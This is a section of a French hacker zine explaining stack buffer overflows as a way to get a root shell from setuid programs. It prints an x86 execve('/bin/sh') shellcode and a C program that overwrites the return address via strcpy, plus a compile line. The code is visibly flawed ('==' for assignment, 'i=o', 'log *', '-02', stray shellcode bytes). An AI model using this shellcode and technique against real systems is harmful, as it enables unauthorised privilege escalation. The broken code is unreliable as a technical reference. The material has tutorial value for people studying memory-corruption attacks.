--------------------------------
( 5. La joie des buffer overflow )
 --------------------------------

Bon, le buffer overflow, vous devez connaître. En bref, le buffer overflow (nb: en français, 
ca veut dire "depassement de tampon") est une procédure visant à accèder à la zone mémoire d'un
programme ayant le suid 0 , on va alors pouvoir obtenir un joli shell root...
On va donc s'attaquer à la programmation d'un buffer overflow.
Le buffer overflow que nous allons réaliser va forcer la mémoire et écraser la zone qui se 
trouve après, c'est à dire la valeur de retour de notre fonction.
On va donc accèder, avec un peu de chance, 
à une zone de mémoire appartenant au root...
 
Le shellcode varie selon le système d'exploitation. 
voici donc le listing d'un buffer overflow de base, avec un shellcode quelconque, 
le tout est que vous compreniez.


/* Déclaration des headers */
#include <string.h>

/* Notre fameux shellcode */
char shellcode[] = 
		"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
		"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
		"\x3b\x00\x00\x00\x8d\x05\x3b\x00\x00\x00\x9a"
		"\x80\xe8\xdc\xff\xff/bin/sh";

char name1[128];
int main(int ac, char **av)
{
   char name2[96];
   int i;
   long *name3;

   name3 == (log *)name1;
   for (i=o; i<32; i++)
      *(name3 + i) = (int) name2;
   for (i=0; i<strlen(shellcode); i++)
      name1[i] = shellcode[i];     	
   strcpy(name2, name1);
   return (0);
}




***************************************************************


Reste à compiler :
gcc buffer.c -ggdb -02 -o buffer


***************************************************************

Voici précisément le fonctionnement de ce programme :

1/ On rempli le tableau de name1 avec l'adresse de name2, qui est là où on écrira notre shellcode.

2/ On copie le shellcode au début de name1.

3/ Notre shellcode va faire un execve dans le repertoire /bin/sh, ce qui nous donne un shell root.

4/ La fonction strcpy() va alors copier name1 dans name2, sans se soucier des zones de mémoires
 allouées pour chacune de ces deux chaînes, et c'est là que tout va se jouer...

Cette fonction va alors dépasser la valeur de retour de la fonction, en l'écrasant avec 
l'adresse  où notre shellcode est situé. Et quand le programme atteint la fin de la fonction
main(), à l'instruction return, il retourne sur le shellcode et du coup execute un shell, 
qui devrait être celui du root avec un peu de chance.... ;p

J'espère avoir été assez clair, démerdez vous avec ça, mon but n'est pas de donner gratuitement
des armes de guerre aux script kiddies, mais plutôt vous initier aux joies des buffer overflow.

Reste encore à compiler le programme dans un repertoire sur votre compte sur le serveur.
( un compte µãçKË$ , mounté via nfs avec Linux, mais vu que ce zine est pas très orienté 
'Hacking de serveurs Linux" on en parlera dans un autre numérhost ( <--- subtil ça :p) )